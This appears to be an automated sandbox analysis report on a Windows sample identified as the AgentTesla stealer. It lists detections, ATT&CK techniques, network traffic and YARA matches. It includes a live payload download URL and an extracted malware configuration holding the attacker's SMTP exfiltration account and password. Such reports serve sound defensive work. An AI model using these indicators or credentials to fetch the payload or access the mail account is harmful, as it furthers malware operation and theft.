Play interactive tour

Edit tour

Analysis Report bF7H5z6B1q.exe

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	100782
Start date:	22.04.2020
Start time:	21:55:41
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 7m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	bF7H5z6B1q.exe
Cookbook file name:	default.jbs
Analysis system description:	W10 x64 1809 Native physical Machine for testing VM-aware malware (Office 2016, Internet Explorer 11, Java 8u231, Adobe Reader DC 19)
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@7/0@1/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 67.8% (good quality ratio 55.4%) Quality average: 66.5% Quality standard deviation: 36%
HCA Information:	Successful, ratio: 92% Number of executed functions: 204 Number of non-executed functions: 37
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, LocalBridge.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 92.122.188.25, 92.122.188.12, 93.184.221.240, 51.105.249.223 Excluded domains from analysis (whitelisted): client.wns.windows.com, am3p.wns.notify.windows.com.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, wu.azureedge.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100	Report FP / FN	false	AgentTesla

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification Spiderchart

Analysis Advice

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation111	Winlogon Helper DLL	Access Token Manipulation1	Disabling Security Tools11	Credential Dumping2	Virtualization/Sandbox Evasion13	Remote File Copy1	Email Collection1	Data Encrypted1	Standard Cryptographic Protocol1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	Graphical User Interface1	Port Monitors	Process Injection12	Virtualization/Sandbox Evasion13	Credentials in Registry1	Process Discovery2	Remote Services	Data from Local System2	Exfiltration Over Other Network Medium	Uncommonly Used Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Windows Management Instrumentation	Accessibility Features	Path Interception	Access Token Manipulation1	Input Capture	Security Software Discovery321	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Remote File Copy1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Scheduled Task	System Firmware	DLL Search Order Hijacking	Process Injection12	Credentials in Files	Remote System Discovery1	Logon Scripts	Input Capture	Data Encrypted	Standard Non-Application Layer Protocol2	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Obfuscated Files or Information1	Account Manipulation	System Information Discovery214	Shared Webroot	Data Staged	Scheduled Transfer	Standard Application Layer Protocol22	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Spearphishing Link	Graphical User Interface	Modify Existing Service	New Service	DLL Side-Loading1	Brute Force	System Owner/User Discovery	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port	Jamming or Denial of Service		Abuse Accessibility Features

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: RegAsm.exe.5096.10.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "=0A0jhVRt", "URL: ": "http://65WgO3Tt3vwSLEL.net", "To: ": "chimez2@originloger.com", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "DSMwV2T", "From: ": "chimez2@originloger.com"}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: bF7H5z6B1q.exe

Virustotal: Detection: 16%

Perma Link

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.0.80:49768 -> 167.114.85.125:80

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.0.80:49771 -> 208.91.199.223:587

IP address seen in connection with other malware

Show sources

Source: Joe Sandbox View

IP Address: 208.91.199.223 208.91.199.223

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View

ASN Name: unknown unknown

Uses SMTP (mail sending)

Show sources

Source: global traffic

TCP traffic: 192.168.0.80:49771 -> 208.91.199.223:587

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

HTTP traffic detected: GET /go/Jay_uncrypt_rZmowgNiLH235.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 167.114.85.125Cache-Control: no-cache

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.85.125

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /go/Jay_uncrypt_rZmowgNiLH235.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 167.114.85.125Cache-Control: no-cache

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: us2.smtp.mailhostbox.com

Urls found in memory or binary data

Show sources

Source: RegAsm.exe	String found in binary or memory: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin
Source: RegAsm.exe, 0000000A.00000002.16901282156.0000000001340000.00000004.00000020.sdmp	String found in binary or memory: http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.binP
Source: RegAsm.exe, 0000000A.00000002.16911244616.0000000020033000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp	String found in binary or memory: http://65WgO3Tt3vwSLEL.net
Source: RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0A
Source: RegAsm.exe, 0000000A.00000002.16915141303.0000000022510000.00000002.00000001.sdmp	String found in binary or memory: https://aka.ms/hcsadmin
Source: RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Contains functionality to call native functions

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AD34 NtSetInformationThread,	10_2_0112AD34
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112A8CD NtProtectVirtualMemory,	10_2_0112A8CD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112039C EnumWindows,NtSetInformationThread,	10_2_0112039C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B11C NtSetInformationThread,	10_2_0112B11C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AD50 NtSetInformationThread,	10_2_0112AD50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01120548 NtSetInformationThread,	10_2_01120548
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B170 NtSetInformationThread,	10_2_0112B170
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AD94 NtSetInformationThread,	10_2_0112AD94
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B1BC NtSetInformationThread,	10_2_0112B1BC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_011205A8 NtSetInformationThread,	10_2_011205A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112ADDC NtSetInformationThread,	10_2_0112ADDC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B025 NtSetInformationThread,	10_2_0112B025
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B074 NtSetInformationThread,	10_2_0112B074
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_011204A6 NtSetInformationThread,	10_2_011204A6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_011204A8 NtSetInformationThread,	10_2_011204A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B0CC NtSetInformationThread,	10_2_0112B0CC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_011204FD NtSetInformationThread,	10_2_011204FD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B321 NtSetInformationThread,	10_2_0112B321
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112072C NtSetInformationThread,	10_2_0112072C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AF55 NtSetInformationThread,	10_2_0112AF55
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AF99 NtSetInformationThread,	10_2_0112AF99
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AFDD NtSetInformationThread,	10_2_0112AFDD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B21D NtSetInformationThread,	10_2_0112B21D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AE25 NtSetInformationThread,	10_2_0112AE25
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01120644 NtSetInformationThread,	10_2_01120644
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AE74 NtSetInformationThread,	10_2_0112AE74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01120694 NtSetInformationThread,	10_2_01120694
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B284 NtSetInformationThread,	10_2_0112B284
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112AEBC NtSetInformationThread,	10_2_0112AEBC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112B2D0 NtSetInformationThread,	10_2_0112B2D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_1FD2B362 NtQuerySystemInformation,	10_2_1FD2B362
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_1FD2B331 NtQuerySystemInformation,	10_2_1FD2B331

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Code function: 3_2_004018FC	3_2_004018FC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FF6E0	10_2_222FF6E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FE070	10_2_222FE070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222F0006	10_2_222F0006
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FE880	10_2_222FE880
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FF41A	10_2_222FF41A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FE06A	10_2_222FE06A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FECA4	10_2_222FECA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FE870	10_2_222FE870
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FEFD9	10_2_222FEFD9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FED16	10_2_222FED16
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_222FF6D1	10_2_222FF6D1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF1E40	10_2_22CF1E40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFEFC0	10_2_22CFEFC0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF07E0	10_2_22CF07E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFE788	10_2_22CFE788
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF59D0	10_2_22CF59D0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF3DE9	10_2_22CF3DE9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFC980	10_2_22CFC980
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF2EC4	10_2_22CF2EC4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFCAC1	10_2_22CFCAC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFCA70	10_2_22CFCA70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF6B5E	10_2_22CF6B5E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFA360	10_2_22CFA360
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF330B	10_2_22CF330B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF50D7	10_2_22CF50D7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFC49A	10_2_22CFC49A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF7490	10_2_22CF7490
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF1E40	10_2_22CF1E40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFB078	10_2_22CFB078
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFA427	10_2_22CFA427
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFBC20	10_2_22CFBC20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF59C6	10_2_22CF59C6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF69F0	10_2_22CF69F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF4990	10_2_22CF4990
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CFC971	10_2_22CFC971
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF3113	10_2_22CF3113
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22CF392D	10_2_22CF392D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE44F8	10_2_22DE44F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE09E8	10_2_22DE09E8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE3850	10_2_22DE3850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE1E48	10_2_22DE1E48
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE0640	10_2_22DE0640
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE2578	10_2_22DE2578
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE0C00	10_2_22DE0C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE5601	10_2_22DE5601
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE0139	10_2_22DE0139
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE1320	10_2_22DE1320
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE09D8	10_2_22DE09D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE44E9	10_2_22DE44E9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE4ABF	10_2_22DE4ABF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE3840	10_2_22DE3840
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE1311	10_2_22DE1311
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE1E39	10_2_22DE1E39
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_22DE0633	10_2_22DE0633

PE file contains strange resources

Show sources

Source: bF7H5z6B1q.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Show sources

Source: bF7H5z6B1q.exe, 00000003.00000002.15791695388.0000000002190000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs bF7H5z6B1q.exe
Source: bF7H5z6B1q.exe, 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameOphic.exe vs bF7H5z6B1q.exe
Source: bF7H5z6B1q.exe	Binary or memory string: OriginalFilenameOphic.exe vs bF7H5z6B1q.exe

Tries to load missing DLLs

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: security.dll	Jump to behavior

Yara signature match

Show sources

Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7

Classification label

Show sources

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@7/0@1/2

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_1FD2B1E6 AdjustTokenPrivileges,		10_2_1FD2B1E6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_1FD2B1AF AdjustTokenPrivileges,		10_2_1FD2B1AF

Creates mutexes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_02

PE file has an executable .text section and no other executable section

Show sources

Source: bF7H5z6B1q.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Reads software policies

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Show sources

Source: bF7H5z6B1q.exe

Virustotal: Detection: 16%

Spawns processes

Show sources

